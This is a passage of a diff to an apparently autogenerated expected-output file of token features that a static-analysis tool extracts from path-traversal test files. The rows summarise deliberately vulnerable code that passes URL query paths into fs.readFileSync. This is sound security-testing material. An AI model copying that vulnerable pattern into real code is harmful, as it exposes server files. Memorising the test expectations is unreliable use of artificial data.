autogenerated/TaintedPath/tainted-string-steps.js:27:18:27:36 | path.split(unknown) | InputArgumentIndex | 0 | | autogenerated/TaintedPath/tainted-string-steps.js:27:18:27:36 | path.split(unknown) | calleeImports | fs | @@ -11547,6 +88126,11 @@ tokenFeatures | autogenerated/TaintedPath/tainted-string-steps.js:27:18:27:36 | path.split(unknown) | enclosingFunctionName | http.createServer#functionalargument | | autogenerated/TaintedPath/tainted-string-steps.js:27:18:27:36 | path.split(unknown) | fileImports | fs http url | | autogenerated/TaintedPath/tainted-string-steps.js:27:18:27:36 | path.split(unknown) | receiverName | fs | +| autogenerated/TaintedPath/tainted-string-steps.js:27:23:27:27 | split | contextFunctionInterfaces | | +| autogenerated/TaintedPath/tainted-string-steps.js:27:23:27:27 | split | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/tainted-string-steps.js:27:23:27:27 | split | enclosingFunctionBody | req res path url parse req url true query path fs readFileSync path substring i j fs readFileSync path substring 4 fs readFileSync path substring 0 i fs readFileSync path substr 4 fs readFileSync path slice 4 fs readFileSync path concat unknown fs readFileSync unknown concat path fs readFileSync unknown concat unknown path fs readFileSync path trim fs readFileSync path toLowerCase fs readFileSync path split / fs readFileSync path 0 split / 0 fs readFileSync path split / i fs readFileSync path split /\\// i fs readFileSync path 0 split ? 0 fs readFileSync path split unknown i fs readFileSync path split unknown whatever fs readFileSync path split unknown fs readFileSync path split ? i | +| autogenerated/TaintedPath/tainted-string-steps.js:27:23:27:27 | split | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/tainted-string-steps.js:27:23:27:27 | split | fileImports | fs http url | | autogenerated/TaintedPath/tainted-string-steps.js:27:29:27:35 | unknown | CalleeFlexibleAccessPath | path.split | | autogenerated/TaintedPath/tainted-string-steps.js:27:29:27:35 | unknown | InputArgumentIndex | 0 | | autogenerated/TaintedPath/tainted-string-steps.js:27:29:27:35 | unknown | calleeImports | url | @@ -11556,6 +88140,51 @@ tokenFeatures | autogenerated/TaintedPath/tainted-string-steps.js:27:29:27:35 | unknown | enclosingFunctionName | http.createServer#functionalargument | | autogenerated/TaintedPath/tainted-string-steps.js:27:29:27:35 | unknown | fileImports | fs http url | | autogenerated/TaintedPath/tainted-string-steps.js:27:29:27:35 | unknown | receiverName | path | +| autogenerated/TaintedPath/tainted-string-steps.js:28:2:28:3 | fs | contextFunctionInterfaces | | +| autogenerated/TaintedPath/tainted-string-steps.js:28:2:28:3 | fs | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/tainted-string-steps.js:28:2:28:3 | fs | enclosingFunctionBody | req res path url parse req url true query path fs readFileSync path substring i j fs readFileSync path substring 4 fs readFileSync path substring 0 i fs readFileSync path substr 4 fs readFileSync path slice 4 fs readFileSync path concat unknown fs readFileSync unknown concat path fs readFileSync unknown concat unknown path fs readFileSync path trim fs readFileSync path toLowerCase fs readFileSync path split / fs readFileSync path 0 split / 0 fs readFileSync path split / i fs readFileSync path split /\\// i fs readFileSync path 0 split ? 0 fs readFileSync path split unknown i fs readFileSync path split unknown whatever fs readFileSync path split unknown fs readFileSync path split ? i | +| autogenerated/TaintedPath/tainted-string-steps.js:28:2:28:3 | fs | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/tainted-string-steps.js:28:2:28:3 | fs | fileImports | fs http url | +| autogenerated/TaintedPath/tainted-string-steps.js:28:2:28:16 | fs.readFileSync | contextFunctionInterfaces | | +| autogenerated/TaintedPath/tainted-string-steps.js:28:2:28:16 | fs.readFileSync | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/tainted-string-steps.js:28:2:28:16 | fs.readFileSync | enclosingFunctionBody | req res path url parse req url true query path fs readFileSync path substring i j fs readFileSync path substring 4 fs readFileSync path substring 0 i fs readFileSync path substr 4 fs readFileSync path slice 4 fs readFileSync path concat unknown fs readFileSync unknown concat path fs readFileSync unknown concat unknown path fs readFileSync path trim fs readFileSync path toLowerCase fs readFileSync path split / fs readFileSync path 0 split / 0 fs readFileSync path split / i fs readFileSync path split /\\// i fs readFileSync path 0 split ? 0 fs readFileSync path split unknown i fs readFileSync path split unknown whatever fs readFileSync path split unknown fs readFileSync path split ? i | +| autogenerated/TaintedPath/tainted-string-steps.js:28:2:28:16 | fs.readFileSync | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/tainted-string-steps.js:28:2:28:16 | fs.readFileSync | fileImports | fs http url | +| autogenerated/TaintedPath/tainted-string-steps.js:28:2:28:36 | exceptional return of fs.read ... ?")[i]) | contextFunctionInterfaces | | +| autogenerated/TaintedPath/tainted-string-steps.js:28:2:28:36 | exceptional return of fs.read ... ?")[i]) | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/tainted-string-steps.js:28:2:28:36 | exceptional return of fs.read ... ?")[i]) | enclosingFunctionBody | req res path url parse req url true query path fs readFileSync path substring i j fs readFileSync path substring 4 fs readFileSync path substring 0 i fs readFileSync path substr 4 fs readFileSync path slice 4 fs readFileSync path concat unknown fs readFileSync unknown concat path fs readFileSync unknown concat unknown path fs readFileSync path trim fs readFileSync path toLowerCase fs readFileSync path split / fs readFileSync path 0 split / 0 fs readFileSync path split / i fs readFileSync path split /\\// i fs readFileSync path 0 split ? 0 fs readFileSync path split unknown i fs readFileSync path split unknown whatever fs readFileSync path split unknown fs readFileSync path split ? i | +| autogenerated/TaintedPath/tainted-string-steps.js:28:2:28:36 | exceptional return of fs.read ... ?")[i]) | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/tainted-string-steps.js:28:2:28:36 | exceptional return of fs.read ... ?")[i]) | fileImports | fs http url | +| autogenerated/TaintedPath/tainted-string-steps.js:28:2:28:36 | fs.read ... ?")[i]) | contextFunctionInterfaces | | +| autogenerated/TaintedPath/tainted-string-steps.js:28:2:28:36 | fs.read ... ?")[i]) | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/tainted-string-steps.js:28:2:28:36 | fs.read ... ?")[i]) | enclosingFunctionBody | req res path url parse req url true query path fs readFileSync path substring i j fs readFileSync path substring 4 fs readFileSync path substring 0 i fs readFileSync path substr 4 fs readFileSync path slice 4 fs readFileSync path concat unknown fs readFileSync unknown concat path fs readFileSync unknown concat unknown path fs readFileSync path trim fs readFileSync path toLowerCase fs readFileSync path split / fs readFileSync path 0 split / 0 fs readFileSync path split / i fs readFileSync path split /\\// i fs readFileSync path 0 split ? 0 fs readFileSync path split unknown i fs readFileSync path split unknown whatever fs readFileSync path split unknown fs readFileSync path split ? i | +| autogenerated/TaintedPath/tainted-string-steps.js:28:2:28:36 | fs.read ... ?")[i]) | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/tainted-string-steps.js:28:2:28:36 | fs.read ... ?")[i]) | fileImports | fs http url | +| autogenerated/TaintedPath/tainted-string-steps.js:28:5:28:16 | readFileSync | contextFunctionInterfaces | | +| autogenerated/TaintedPath/tainted-string-steps.js:28:5:28:16 | readFileSync | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/tainted-string-steps.js:28:5:28:16 | readFileSync | enclosingFunctionBody | req res path url parse req url true query path fs readFileSync path substring i j fs readFileSync path substring 4 fs readFileSync path substring 0 i fs readFileSync path substr 4 fs readFileSync path slice 4 fs readFileSync path concat unknown fs readFileSync unknown concat path fs readFileSync unknown concat unknown path fs readFileSync path trim fs readFileSync path toLowerCase fs readFileSync path split / fs readFileSync path 0 split / 0 fs readFileSync path split / i fs readFileSync path split /\\// i fs readFileSync path 0 split ? 0 fs readFileSync path split unknown i fs readFileSync path split unknown whatever fs readFileSync path split unknown fs readFileSync path split ? i | +| autogenerated/TaintedPath/tainted-string-steps.js:28:5:28:16 | readFileSync | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/tainted-string-steps.js:28:5:28:16 | readFileSync | fileImports | fs http url | +| autogenerated/TaintedPath/tainted-string-steps.js:28:18:28:21 | path | contextFunctionInterfaces | | +| autogenerated/TaintedPath/tainted-string-steps.js:28:18:28:21 | path | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/tainted-string-steps.js:28:18:28:21 | path | enclosingFunctionBody | req res path url parse req url true query path fs readFileSync path substring i j fs readFileSync path substring 4 fs readFileSync path substring 0 i fs readFileSync path substr 4 fs readFileSync path slice 4 fs readFileSync path concat unknown fs readFileSync unknown concat path fs readFileSync unknown concat unknown path fs readFileSync path trim fs readFileSync path toLowerCase fs readFileSync path split / fs readFileSync path 0 split / 0 fs readFileSync path split / i fs readFileSync path split /\\// i fs readFileSync path 0 split ? 0 fs readFileSync path split unknown i fs readFileSync path split unknown whatever fs readFileSync path split unknown fs readFileSync path split ? i | +| autogenerated/TaintedPath/tainted-string-steps.js:28:18:28:21 | path | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/tainted-string-steps.js:28:18:28:21 | path | fileImports | fs http url | +| autogenerated/TaintedPath/tainted-string-steps.js:28:18:28:27 | path.split | contextFunctionInterfaces | | +| autogenerated/TaintedPath/tainted-string-steps.js:28:18:28:27 | path.split | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/tainted-string-steps.js:28:18:28:27 | path.split | enclosingFunctionBody | req res path url parse req url true query path fs readFileSync path substring i j fs readFileSync path substring 4 fs readFileSync path substring 0 i fs readFileSync path substr 4 fs readFileSync path slice 4 fs readFileSync path concat unknown fs readFileSync unknown concat path fs readFileSync unknown concat unknown path fs readFileSync path trim fs readFileSync path toLowerCase fs readFileSync path split / fs readFileSync path 0 split / 0 fs readFileSync path split / i fs readFileSync path split /\\// i fs readFileSync path 0 split ? 0 fs readFileSync path split unknown i fs readFileSync path split unknown whatever fs readFileSync path split unknown fs readFileSync path split ? i | +| autogenerated/TaintedPath/tainted-string-steps.js:28:18:28:27 | path.split | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/tainted-string-steps.js:28:18:28:27 | path.split | fileImports | fs http url | +| autogenerated/TaintedPath/tainted-string-steps.js:28:18:28:32 | exceptional return of path.split("?") | contextFunctionInterfaces | | +| autogenerated/TaintedPath/tainted-string-steps.js:28:18:28:32 | exceptional return of path.split("?") | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/tainted-string-steps.js:28:18:28:32 | exceptional return of path.split("?") | enclosingFunctionBody | req res path url parse req url true query path fs readFileSync path substring i j fs readFileSync path substring 4 fs readFileSync path substring 0 i fs readFileSync path substr 4 fs readFileSync path slice 4 fs readFileSync path concat unknown fs readFileSync unknown concat path fs readFileSync unknown concat unknown path fs readFileSync path trim fs readFileSync path toLowerCase fs readFileSync path split / fs readFileSync path 0 split / 0 fs readFileSync path split / i fs readFileSync path split /\\// i fs readFileSync path 0 split ? 0 fs readFileSync path split unknown i fs readFileSync path split unknown whatever fs readFileSync path split unknown fs readFileSync path split ? i | +| autogenerated/TaintedPath/tainted-string-steps.js:28:18:28:32 | exceptional return of path.split("?") | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/tainted-string-steps.js:28:18:28:32 | exceptional return of path.split("?") | fileImports | fs http url | +| autogenerated/TaintedPath/tainted-string-steps.js:28:18:28:32 | path.split("?") | contextFunctionInterfaces | | +| autogenerated/TaintedPath/tainted-string-steps.js:28:18:28:32 | path.split("?") | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/tainted-string-steps.js:28:18:28:32 | path.split("?") | enclosingFunctionBody | req res path url parse req url true query path fs readFileSync path substring i j fs readFileSync path substring 4 fs readFileSync path substring 0 i fs readFileSync path substr 4 fs readFileSync path slice 4 fs readFileSync path concat unknown fs readFileSync unknown concat path fs readFileSync unknown concat unknown path fs readFileSync path trim fs readFileSync path toLowerCase fs readFileSync path split / fs readFileSync path 0 split / 0 fs readFileSync path split / i fs readFileSync path split /\\// i fs readFileSync path 0 split ? 0 fs readFileSync path split unknown i fs readFileSync path split unknown whatever fs readFileSync path split unknown fs readFileSync path split ? i | +| autogenerated/TaintedPath/tainted-string-steps.js:28:18:28:32 | path.split("?") | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/tainted-string-steps.js:28:18:28:32 | path.split("?") | fileImports | fs http url | | autogenerated/TaintedPath/tainted-string-steps.js:28:18:28:35 | path.split("?")[i] | CalleeFlexibleAccessPath | fs.readFileSync | | autogenerated/TaintedPath/tainted-string-steps.js:28:18:28:35 | path.split("?")[i] | InputArgumentIndex | 0 | | autogenerated/TaintedPath/tainted-string-steps.js:28:18:28:35 | path.split("?")[i] | calleeImports | fs | @@ -11565,6 +88194,11 @@ tokenFeatures | autogenerated/TaintedPath/tainted-string-steps.js:28:18:28:35 | path.split("?")[i] | enclosingFunctionName | http.createServer#functionalargument | | autogenerated/TaintedPath/tainted-string-steps.js:28:18:28:35 | path.split("?")[i] | fileImports | fs http url | | autogenerated/TaintedPath/tainted-string-steps.js:28:18:28:35 | path.split("?")[i] | receiverName | fs | +| autogenerated/TaintedPath/tainted-string-steps.js:28:23:28:27 | split | contextFunctionInterfaces | | +| autogenerated/TaintedPath/tainted-string-steps.js:28:23:28:27 | split | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/tainted-string-steps.js:28:23:28:27 | split | enclosingFunctionBody | req res path url parse req url true query path fs readFileSync path substring i j fs readFileSync path substring 4 fs readFileSync path substring 0 i fs readFileSync path substr 4 fs readFileSync path slice 4 fs readFileSync path concat unknown fs readFileSync unknown concat path fs readFileSync unknown concat unknown path fs readFileSync path trim fs readFileSync path toLowerCase fs readFileSync path split / fs readFileSync path 0 split / 0 fs readFileSync path split / i fs readFileSync path split /\\// i fs readFileSync path 0 split ? 0 fs readFileSync path split unknown i fs readFileSync path split unknown whatever fs readFileSync path split unknown fs readFileSync path split ? i | +| autogenerated/TaintedPath/tainted-string-steps.js:28:23:28:27 | split | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/tainted-string-steps.js:28:23:28:27 | split | fileImports | fs http url | | autogenerated/TaintedPath/tainted-string-steps.js:28:29:28:31 | "?" | CalleeFlexibleAccessPath | path.split | | autogenerated/TaintedPath/tainted-string-steps.js:28:29:28:31 | "?" | InputArgumentIndex | 0 | | autogenerated/TaintedPath/tainted-string-steps.js:28:29:28:31 | "?" | calleeImports | url | @@ -11574,18 +88208,179 @@ tokenFeatures | autogenerated/TaintedPath/tainted-string-steps.js:28:29:28:31 | "?" | enclosingFunctionName | http.createServer#functionalargument | | autogenerated/TaintedPath/tainted-string-steps.js:28:29:28:31 | "?" | fileImports | fs http url | | autogenerated/TaintedPath/tainted-string-steps.js:28:29:28:31 | "?" | receiverName | path | +| autogenerated/TaintedPath/tainted-string-steps.js:28:34:28:34 | i | contextFunctionInterfaces | | +| autogenerated/TaintedPath/tainted-string-steps.js:28:34:28:34 | i | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/tainted-string-steps.js:28:34:28:34 | i | enclosingFunctionBody | req res path url parse req url true query path fs readFileSync path substring i j fs readFileSync path substring 4 fs readFileSync path substring 0 i fs readFileSync path substr 4 fs readFileSync path slice 4 fs readFileSync path concat unknown fs readFileSync unknown concat path fs readFileSync unknown concat unknown path fs readFileSync path trim fs readFileSync path toLowerCase fs readFileSync path split / fs readFileSync path 0 split / 0 fs readFileSync path split / i fs readFileSync path split /\\// i fs readFileSync path 0 split ? 0 fs readFileSync path split unknown i fs readFileSync path split unknown whatever fs readFileSync path split unknown fs readFileSync path split ? i | +| autogenerated/TaintedPath/tainted-string-steps.js:28:34:28:34 | i | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/tainted-string-steps.js:28:34:28:34 | i | fileImports | fs http url | +| autogenerated/TaintedPath/tainted-string-steps.js:31:1:31:6 | server | contextFunctionInterfaces | | +| autogenerated/TaintedPath/tainted-string-steps.js:31:1:31:6 | server | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/tainted-string-steps.js:31:1:31:6 | server | fileImports | fs http url | +| autogenerated/TaintedPath/tainted-string-steps.js:31:1:31:13 | server.listen | contextFunctionInterfaces | | +| autogenerated/TaintedPath/tainted-string-steps.js:31:1:31:13 | server.listen | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/tainted-string-steps.js:31:1:31:13 | server.listen | fileImports | fs http url | +| autogenerated/TaintedPath/tainted-string-steps.js:31:1:31:15 | exceptional return of server.listen() | contextFunctionInterfaces | | +| autogenerated/TaintedPath/tainted-string-steps.js:31:1:31:15 | exceptional return of server.listen() | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/tainted-string-steps.js:31:1:31:15 | exceptional return of server.listen() | fileImports | fs http url | +| autogenerated/TaintedPath/tainted-string-steps.js:31:1:31:15 | server.listen() | contextFunctionInterfaces | | +| autogenerated/TaintedPath/tainted-string-steps.js:31:1:31:15 | server.listen() | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/tainted-string-steps.js:31:1:31:15 | server.listen() | fileImports | fs http url | +| autogenerated/TaintedPath/tainted-string-steps.js:31:8:31:13 | listen | contextFunctionInterfaces | | +| autogenerated/TaintedPath/tainted-string-steps.js:31:8:31:13 | listen | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/tainted-string-steps.js:31:8:31:13 | listen | fileImports | fs http url | +| autogenerated/TaintedPath/torrents.js:1:1:1:0 | this | contextFunctionInterfaces | getTorrentData(dir, torrent) | +| autogenerated/TaintedPath/torrents.js:1:1:1:0 | this | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/torrents.js:1:1:1:0 | this | fileImports | fs parse-torrent | +| autogenerated/TaintedPath/torrents.js:1:1:1:1 | fs | contextFunctionInterfaces | getTorrentData(dir, torrent) | +| autogenerated/TaintedPath/torrents.js:1:1:1:1 | fs | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/torrents.js:1:1:1:1 | fs | fileImports | fs parse-torrent | +| autogenerated/TaintedPath/torrents.js:1:1:1:1 | parseTorrent | contextFunctionInterfaces | getTorrentData(dir, torrent) | +| autogenerated/TaintedPath/torrents.js:1:1:1:1 | parseTorrent | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/torrents.js:1:1:1:1 | parseTorrent | fileImports | fs parse-torrent | +| autogenerated/TaintedPath/torrents.js:1:1:1:1 | require | contextFunctionInterfaces | getTorrentData(dir, torrent) | +| autogenerated/TaintedPath/torrents.js:1:1:1:1 | require | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/torrents.js:1:1:1:1 | require | fileImports | fs parse-torrent | +| autogenerated/TaintedPath/torrents.js:1:7:1:18 | parseTorrent | contextFunctionInterfaces | getTorrentData(dir, torrent) | +| autogenerated/TaintedPath/torrents.js:1:7:1:18 | parseTorrent | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/torrents.js:1:7:1:18 | parseTorrent | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/torrents.js:1:7:1:18 | parseTorrent | fileImports | fs parse-torrent | +| autogenerated/TaintedPath/torrents.js:1:7:1:45 | parseTo ... rrent') | contextFunctionInterfaces | getTorrentData(dir, torrent) | +| autogenerated/TaintedPath/torrents.js:1:7:1:45 | parseTo ... rrent') | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/torrents.js:1:7:1:45 | parseTo ... rrent') | fileImports | fs parse-torrent | +| autogenerated/TaintedPath/torrents.js:1:7:1:45 | parseTorrent | contextFunctionInterfaces | getTorrentData(dir, torrent) | +| autogenerated/TaintedPath/torrents.js:1:7:1:45 | parseTorrent | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/torrents.js:1:7:1:45 | parseTorrent | fileImports | fs parse-torrent | +| autogenerated/TaintedPath/torrents.js:1:22:1:28 | require | contextFunctionInterfaces | getTorrentData(dir, torrent) | +| autogenerated/TaintedPath/torrents.js:1:22:1:28 | require | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/torrents.js:1:22:1:28 | require | fileImports | fs parse-torrent | +| autogenerated/TaintedPath/torrents.js:1:22:1:45 | exceptional return of require ... rrent') | contextFunctionInterfaces | getTorrentData(dir, torrent) | +| autogenerated/TaintedPath/torrents.js:1:22:1:45 | exceptional return of require ... rrent') | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/torrents.js:1:22:1:45 | exceptional return of require ... rrent') | fileImports | fs parse-torrent | +| autogenerated/TaintedPath/torrents.js:1:22:1:45 | require ... rrent') | contextFunctionInterfaces | getTorrentData(dir, torrent) | +| autogenerated/TaintedPath/torrents.js:1:22:1:45 | require ... rrent') | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/torrents.js:1:22:1:45 | require ... rrent') | fileImports | fs parse-torrent | | autogenerated/TaintedPath/torrents.js:1:30:1:44 | 'parse-torrent' | CalleeFlexibleAccessPath | require | | autogenerated/TaintedPath/torrents.js:1:30:1:44 | 'parse-torrent' | InputArgumentIndex | 0 | | autogenerated/TaintedPath/torrents.js:1:30:1:44 | 'parse-torrent' | calleeImports | | | autogenerated/TaintedPath/torrents.js:1:30:1:44 | 'parse-torrent' | contextFunctionInterfaces | getTorrentData(dir, torrent) | | autogenerated/TaintedPath/torrents.js:1:30:1:44 | 'parse-torrent' | contextSurroundingFunctionParameters | | | autogenerated/TaintedPath/torrents.js:1:30:1:44 | 'parse-torrent' | fileImports | fs parse-torrent | +| autogenerated/TaintedPath/torrents.js:2:7:2:8 | fs | contextFunctionInterfaces | getTorrentData(dir, torrent) | +| autogenerated/TaintedPath/torrents.js:2:7:2:8 | fs | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/torrents.js:2:7:2:8 | fs | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/torrents.js:2:7:2:8 | fs | fileImports | fs parse-torrent | +| autogenerated/TaintedPath/torrents.js:2:7:2:24 | fs | contextFunctionInterfaces | getTorrentData(dir, torrent) | +| autogenerated/TaintedPath/torrents.js:2:7:2:24 | fs | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/torrents.js:2:7:2:24 | fs | fileImports | fs parse-torrent | +| autogenerated/TaintedPath/torrents.js:2:7:2:24 | fs = require('fs') | contextFunctionInterfaces | getTorrentData(dir, torrent) | +| autogenerated/TaintedPath/torrents.js:2:7:2:24 | fs = require('fs') | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/torrents.js:2:7:2:24 | fs = require('fs') | fileImports | fs parse-torrent | +| autogenerated/TaintedPath/torrents.js:2:12:2:18 | require | contextFunctionInterfaces | getTorrentData(dir, torrent) | +| autogenerated/TaintedPath/torrents.js:2:12:2:18 | require | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/torrents.js:2:12:2:18 | require | fileImports | fs parse-torrent | +| autogenerated/TaintedPath/torrents.js:2:12:2:24 | exceptional return of require('fs') | contextFunctionInterfaces | getTorrentData(dir, torrent) | +| autogenerated/TaintedPath/torrents.js:2:12:2:24 | exceptional return of require('fs') | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/torrents.js:2:12:2:24 | exceptional return of require('fs') | fileImports | fs parse-torrent | +| autogenerated/TaintedPath/torrents.js:2:12:2:24 | require('fs') | contextFunctionInterfaces | getTorrentData(dir, torrent) | +| autogenerated/TaintedPath/torrents.js:2:12:2:24 | require('fs') | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/torrents.js:2:12:2:24 | require('fs') | fileImports | fs parse-torrent | | autogenerated/TaintedPath/torrents.js:2:20:2:23 | 'fs' | CalleeFlexibleAccessPath | require | | autogenerated/TaintedPath/torrents.js:2:20:2:23 | 'fs' | InputArgumentIndex | 0 | | autogenerated/TaintedPath/torrents.js:2:20:2:23 | 'fs' | calleeImports | | | autogenerated/TaintedPath/torrents.js:2:20:2:23 | 'fs' | contextFunctionInterfaces | getTorrentData(dir, torrent) | | autogenerated/TaintedPath/torrents.js:2:20:2:23 | 'fs' | contextSurroundingFunctionParameters | | | autogenerated/TaintedPath/torrents.js:2:20:2:23 | 'fs' | fileImports | fs parse-torrent | +| autogenerated/TaintedPath/torrents.js:4:1:4:0 | fs | contextFunctionInterfaces | getTorrentData(dir, torrent) | +| autogenerated/TaintedPath/torrents.js:4:1:4:0 | fs | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/torrents.js:4:1:4:0 | fs | enclosingFunctionBody | dir torrent name parseTorrent torrent name loc dir / name .torrent.data fs readFileSync loc | +| autogenerated/TaintedPath/torrents.js:4:1:4:0 | fs | enclosingFunctionName | getTorrentData | +| autogenerated/TaintedPath/torrents.js:4:1:4:0 | fs | fileImports | fs parse-torrent | +| autogenerated/TaintedPath/torrents.js:4:1:4:0 | parseTorrent | contextFunctionInterfaces | getTorrentData(dir, torrent) | +| autogenerated/TaintedPath/torrents.js:4:1:4:0 | parseTorrent | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/torrents.js:4:1:4:0 | parseTorrent | enclosingFunctionBody | dir torrent name parseTorrent torrent name loc dir / name .torrent.data fs readFileSync loc | +| autogenerated/TaintedPath/torrents.js:4:1:4:0 | parseTorrent | enclosingFunctionName | getTorrentData | +| autogenerated/TaintedPath/torrents.js:4:1:4:0 | parseTorrent | fileImports | fs parse-torrent | +| autogenerated/TaintedPath/torrents.js:4:1:4:0 | this | contextFunctionInterfaces | getTorrentData(dir, torrent) | +| autogenerated/TaintedPath/torrents.js:4:1:4:0 | this | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/torrents.js:4:1:4:0 | this | enclosingFunctionBody | dir torrent name parseTorrent torrent name loc dir / name .torrent.data fs readFileSync loc | +| autogenerated/TaintedPath/torrents.js:4:1:4:0 | this | enclosingFunctionName | getTorrentData | +| autogenerated/TaintedPath/torrents.js:4:1:4:0 | this | fileImports | fs parse-torrent | +| autogenerated/TaintedPath/torrents.js:4:1:8:1 | 'arguments' object of function getTorrentData | contextFunctionInterfaces | getTorrentData(dir, torrent) | +| autogenerated/TaintedPath/torrents.js:4:1:8:1 | 'arguments' object of function getTorrentData | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/torrents.js:4:1:8:1 | 'arguments' object of function getTorrentData | enclosingFunctionBody | dir torrent name parseTorrent torrent name loc dir / name .torrent.data fs readFileSync loc | +| autogenerated/TaintedPath/torrents.js:4:1:8:1 | 'arguments' object of function getTorrentData | enclosingFunctionName | getTorrentData | +| autogenerated/TaintedPath/torrents.js:4:1:8:1 | 'arguments' object of function getTorrentData | fileImports | fs parse-torrent | +| autogenerated/TaintedPath/torrents.js:4:1:8:1 | exceptional return of function getTorrentData | contextFunctionInterfaces | getTorrentData(dir, torrent) | +| autogenerated/TaintedPath/torrents.js:4:1:8:1 | exceptional return of function getTorrentData | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/torrents.js:4:1:8:1 | exceptional return of function getTorrentData | enclosingFunctionBody | dir torrent name parseTorrent torrent name loc dir / name .torrent.data fs readFileSync loc | +| autogenerated/TaintedPath/torrents.js:4:1:8:1 | exceptional return of function getTorrentData | enclosingFunctionName | getTorrentData | +| autogenerated/TaintedPath/torrents.js:4:1:8:1 | exceptional return of function getTorrentData | fileImports | fs parse-torrent | +| autogenerated/TaintedPath/torrents.js:4:1:8:1 | functio ... OT OK\\n} | contextFunctionInterfaces | getTorrentData(dir, torrent) | +| autogenerated/TaintedPath/torrents.js:4:1:8:1 | functio ... OT OK\\n} | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/torrents.js:4:1:8:1 | functio ... OT OK\\n} | fileImports | fs parse-torrent | +| autogenerated/TaintedPath/torrents.js:4:1:8:1 | return of function getTorrentData | contextFunctionInterfaces | getTorrentData(dir, torrent) | +| autogenerated/TaintedPath/torrents.js:4:1:8:1 | return of function getTorrentData | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/torrents.js:4:1:8:1 | return of function getTorrentData | enclosingFunctionBody | dir torrent name parseTorrent torrent name loc dir / name .torrent.data fs readFileSync loc | +| autogenerated/TaintedPath/torrents.js:4:1:8:1 | return of function getTorrentData | enclosingFunctionName | getTorrentData | +| autogenerated/TaintedPath/torrents.js:4:1:8:1 | return of function getTorrentData | fileImports | fs parse-torrent | +| autogenerated/TaintedPath/torrents.js:4:10:4:23 | getTorrentData | contextFunctionInterfaces | getTorrentData(dir, torrent) | +| autogenerated/TaintedPath/torrents.js:4:10:4:23 | getTorrentData | contextSurroundingFunctionParameters | (dir, torrent) | +| autogenerated/TaintedPath/torrents.js:4:10:4:23 | getTorrentData | fileImports | fs parse-torrent | +| autogenerated/TaintedPath/torrents.js:4:25:4:27 | dir | contextFunctionInterfaces | getTorrentData(dir, torrent) | +| autogenerated/TaintedPath/torrents.js:4:25:4:27 | dir | contextFunctionInterfaces | getTorrentData(dir, torrent) | +| autogenerated/TaintedPath/torrents.js:4:25:4:27 | dir | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/torrents.js:4:25:4:27 | dir | contextSurroundingFunctionParameters | (dir, torrent) | +| autogenerated/TaintedPath/torrents.js:4:25:4:27 | dir | enclosingFunctionBody | dir torrent name parseTorrent torrent name loc dir / name .torrent.data fs readFileSync loc | +| autogenerated/TaintedPath/torrents.js:4:25:4:27 | dir | enclosingFunctionBody | dir torrent name parseTorrent torrent name loc dir / name .torrent.data fs readFileSync loc | +| autogenerated/TaintedPath/torrents.js:4:25:4:27 | dir | enclosingFunctionName | getTorrentData | +| autogenerated/TaintedPath/torrents.js:4:25:4:27 | dir | enclosingFunctionName | getTorrentData | +| autogenerated/TaintedPath/torrents.js:4:25:4:27 | dir | fileImports | fs parse-torrent | +| autogenerated/TaintedPath/torrents.js:4:25:4:27 | dir | fileImports | fs parse-torrent | +| autogenerated/TaintedPath/torrents.js:4:30:4:36 | torrent | 